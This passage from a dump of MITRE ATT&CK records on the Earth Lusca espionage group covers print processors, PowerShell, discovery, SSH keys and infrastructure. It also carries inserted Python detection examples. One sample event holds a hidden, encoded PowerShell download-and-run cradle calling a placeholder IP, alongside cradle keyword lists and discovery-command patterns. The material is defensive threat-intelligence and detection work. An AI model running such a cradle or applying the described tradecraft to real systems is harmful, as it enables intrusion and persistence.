For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, which can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1547.012 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'File: File Creation', 'Driver: Driver Load', 'Module: Module Load', 'Process: OS API Execution'] permissions_required : ['Administrator', 'SYSTEM'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6e2b1acc-87b5-4947-a933-b376d48b126a revoked : False technique : PowerShell technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can then be run from disk or entirely in memory.
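Two points in this description turn naturally into checks: the download-and-run cradle hidden behind `-EncodedCommand`, and (covered in the next paragraph) PowerShell hosted by a process other than `powershell.exe` through `System.Management.Automation`. The following added example, not code from this page or the cited reports, decodes encoded command lines and flags download cradles, and lists processes that loaded the engine DLL without being an expected host, over constructed Sysmon-style process-creation and module-load events. The expected-host set, the cradle markers and the module paths are assumptions.

```python
import base64
import re
from pathlib import PureWindowsPath

# Assumed set of processes expected to host the PowerShell engine; extend from a baseline
# with legitimate in-house hosts (SQL or Exchange management shells, for example).
EXPECTED_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ENGINE_DLLS = {"system.management.automation.dll", "system.management.automation.ni.dll"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "iex", "invoke-expression", "frombase64string")


def encode_command(script):
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Decoded script from a -EncodedCommand argument, or None if the command line has none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def download_cradle_findings(process_events):
    """Decode -EncodedCommand payloads and flag the ones that fetch and run code from the network."""
    findings = []
    for e in process_events:
        script = decode_encoded_command(e["CommandLine"])
        if script is None:
            continue
        lowered = script.lower()
        markers = [k for k in CRADLE_MARKERS if k in lowered]
        if markers:
            findings.append({"pid": e["ProcessId"], "decoded": script, "markers": markers})
    return findings


def unmanaged_engine_hosts(module_events):
    """Processes that loaded the PowerShell engine DLL without being a recognised PowerShell host."""
    return sorted({
        (e["ProcessId"], PureWindowsPath(e["Image"]).name.lower())
        for e in module_events
        if PureWindowsPath(e["ImageLoaded"]).name.lower() in ENGINE_DLLS
        and PureWindowsPath(e["Image"]).name.lower() not in EXPECTED_HOSTS
    })


# Constructed samples. The encoded payload is produced here from plain text so the example is self-consistent.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage1.ps1')"
SAMPLE_PROCESS_EVENTS = [
    {"ProcessId": 5012, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE)},
    {"ProcessId": 5020, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand "
                    + encode_command("Get-Service | Where-Object Status -eq Running")},
    {"ProcessId": 5031, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]
# Sysmon Event ID 7 style image loads (constructed; the native-image hash directory is made up).
SAMPLE_MODULE_EVENTS = [
    {"ProcessId": 5012, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"},
    {"ProcessId": 6108, "Image": r"C:\Users\Public\svchost.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"},
    {"ProcessId": 6122, "Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1e2d3c4b5a69788\System.Management.Automation.ni.dll"},
    {"ProcessId": 6130, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\user32.dll"},
]

if __name__ == "__main__":
    for f in download_cradle_findings(SAMPLE_PROCESS_EVENTS):
        print(f"pid {f['pid']}: {f['markers']} :: {f['decoded']}")
    print("engine loaded outside an expected host:", unmanaged_engine_hosts(SAMPLE_MODULE_EVENTS))
```

The module-load rule is what catches the second case in the description: a process that never launches `powershell.exe` but still pulls in `System.Management.Automation` (here a fake `svchost.exe` in a user-writable directory and `rundll32.exe`). The native-image `.ni.dll` name is included because that is the file actually mapped on hosts where the assembly has been NGen-compiled.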
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET Framework and the Common Language Infrastructure (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1059.001 matrix : mitre-attack platform : ['Windows'] data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--aae6444e-c9e5-4965-9499-8aa6d546b58e revoked : False technique : System Service Discovery technique_description : Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1007 matrix : mitre-attack platform : ['Windows', 'macOS', 'Linux'] data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6ef89fa5-cd74-499b-bbc0-3b0d83baeba1 revoked : False technique : Process Discovery technique_description : Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. On macOS and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
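The commands named under System Service Discovery and Process Discovery above (`sc query`, `tasklist /svc`, `net start`, `systemctl --type=service`, `Get-Process`, `ps`, `show processes`) are individually unremarkable; what marks reconnaissance is several of them from one host inside a short window. The following added example, not code from this page or the cited reports, classifies command lines to T1007 and T1057 (a `tasklist /svc` maps to both, which is how this page records Earth Lusca's Tasklist use) and reports per-host bursts over constructed command-execution events. The ten-minute window and the minimum of three commands are assumptions.

```python
import re
from datetime import datetime, timedelta

# One pattern per technique. Anchored forms avoid matching e.g. psexec as ps, and
# `net start <svc>` (starting a service) is deliberately not treated as discovery.
DISCOVERY_RULES = [
    ("T1007", re.compile(
        r"^(?:sc(?:\.exe)?\s+query\b|tasklist(?:\.exe)?\s.*/svc\b|net(?:\.exe)?\s+start\s*$|systemctl\s.*--type=service)",
        re.IGNORECASE)),
    ("T1057", re.compile(
        r"^(?:tasklist(?:\.exe)?(?:\s|$)|ps(?:\s|$)|show\s+processes\b)|\bget-process\b",
        re.IGNORECASE)),
]

# Constructed command-execution events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": "alice", "time": "2022-03-14T10:00:05", "CommandLine": "tasklist /svc"},
    {"host": "WS-17", "user": "alice", "time": "2022-03-14T10:01:40", "CommandLine": "net start"},
    {"host": "WS-17", "user": "alice", "time": "2022-03-14T10:03:12", "CommandLine": "sc query state= all"},
    {"host": "WS-17", "user": "alice", "time": "2022-03-14T10:04:00", "CommandLine": "net start Spooler"},
    {"host": "WS-03", "user": "bob", "time": "2022-03-14T09:00:00", "CommandLine": "tasklist"},
    {"host": "WS-03", "user": "bob", "time": "2022-03-14T15:30:00",
     "CommandLine": 'powershell.exe -c "Get-Process lsass"'},
    {"host": "SRV-LNX1", "user": "www-data", "time": "2022-03-14T11:00:00", "CommandLine": "systemctl --type=service"},
    {"host": "SRV-LNX1", "user": "www-data", "time": "2022-03-14T11:00:30", "CommandLine": "ps aux"},
    {"host": "RTR-EDGE", "user": "admin", "time": "2022-03-14T12:00:00", "CommandLine": "show processes cpu sorted"},
]


def classify(cmdline):
    """Technique IDs matched by one command line; may be several (tasklist /svc hits both)."""
    line = cmdline.strip()
    return [tid for tid, rx in DISCOVERY_RULES if rx.search(line)]


def discovery_bursts(events, window=timedelta(minutes=10), min_commands=3):
    """Per host, the first window holding at least min_commands discovery commands, if any."""
    per_host = {}
    for e in events:
        techniques = classify(e["CommandLine"])
        if techniques:
            per_host.setdefault(e["host"], []).append(
                (datetime.fromisoformat(e["time"]), e["CommandLine"], techniques))
    bursts = {}
    for host, items in per_host.items():
        items.sort()
        for i in range(len(items)):
            start = items[i][0]
            run = [it for it in items[i:] if it[0] - start <= window]
            if len(run) >= min_commands:
                bursts[host] = {
                    "start": start.isoformat(),
                    "commands": [cmd for _, cmd, _ in run],
                    "techniques": sorted({t for _, _, ts in run for t in ts}),
                }
                break
    return bursts


if __name__ == "__main__":
    for host, b in discovery_bursts(SAMPLE_EVENTS).items():
        print(f"{host} from {b['start']}: {b['commands']} -> {b['techniques']}")
```

With the defaults only the Windows workstation is reported: its `net start Spooler` is excluded as an administrative action, leaving three discovery commands inside four minutes. Lowering the minimum to two also surfaces the Linux host, which is the trade-off to make consciously, since a single `ps aux` from an administrator is routine.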
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1057 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Process: Process Creation', 'Process: OS API Execution', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a38efb2d-3014-4196-b936-326a9a65ee83 revoked : False technique : Domain Trust Discovery technique_description : Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain.
The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1482 matrix : mitre-attack platform : ['Windows'] data_sources : ['Process: Process Creation', 'Command: Command Execution', 'Script: Script Execution', 'Network Traffic: Network Traffic Content', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--1307fdab-a09c-4d48-a917-a76ba0113098 revoked : False technique : SSH Authorized Keys technique_description : Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API.
For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user. Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1098.004 matrix : mitre-attack platform : ['Linux', 'macOS', 'IaaS', 'Network'] data_sources : ['Command: Command Execution', 'Process: Process Creation', 'File: File Modification']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a8fef3c0-796a-4995-81fe-c47336c3ddbd revoked : False technique : Tool technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1588.002 matrix : mitre-attack platform : ['PRE'] data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e607a77e-5c5c-4f3e-a62d-82124a434911 revoked : False technique : Malware technique_description : Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1588.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--0167e4ad-b828-4813-88bf-f5b03b4d3268 revoked : False technique : Web Services technique_description : Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.006 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--2dc666e3-b715-425c-b8b4-f3c0f7d6d8e9 revoked : False technique : Web Services technique_description : Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations.
Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1584.006 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--0e837480-f359-4bdc-875a-d953027d17b0 revoked : False technique : Upload Malware technique_description : Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1608.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--5ce84367-05cc-446e-a744-08a46f103552 revoked : False technique : Domains technique_description : Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) 
to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Domain Name: Passive DNS', 'Domain Name: Domain Registration', 'Domain Name: Active DNS'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
